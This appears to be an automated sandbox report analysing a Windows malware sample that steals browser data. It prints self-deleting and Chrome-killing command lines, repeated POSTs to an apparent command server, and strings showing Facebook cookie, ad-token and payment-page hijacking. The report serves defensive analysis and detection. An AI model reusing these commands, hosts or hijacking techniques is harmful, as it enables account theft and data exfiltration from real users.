Analysis Report Cyfj6XGbkd

Overview

General Information

Sample Name: Cyfj6XGbkd (renamed file extension from none to exe)
Analysis ID: 346134
MD5: 63204eb716c856723a010747d58a6b00
SHA1: 7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256: 6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456

Detection

Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Startup

  • System is w10x64
  • Cyfj6XGbkd.exe (PID: 1676 cmdline: 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: 63204EB716C856723A010747D58A6B00)
    • msiexec.exe (PID: 4828 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 56BB1610C0318054.exe (PID: 476 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • 1611970637183.exe (PID: 6028 cmdline: 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 6236 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 4248 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 56BB1610C0318054.exe (PID: 576 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • cmd.exe (PID: 6012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5740 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6752 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6624 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6336 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6452 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 4584 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.2560000.3.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.2810000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.10000000.6.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth | 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Metadefender: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: Cyfj6XGbkd.exe | Virustotal: Detection: 40%
Source: Cyfj6XGbkd.exe | Metadefender: Detection: 24%
Source: Cyfj6XGbkd.exe | ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Cyfj6XGbkd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,2_2_1001F720

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Unpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Unpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Uses 32bit PE files
Source: Cyfj6XGbkd.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_1001A170 FindFirstFileA,FindClose,2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: global traffic | HTTP traffic detected: POST //fine/send HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 82 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 677 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 1393 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exeString found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exeString found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
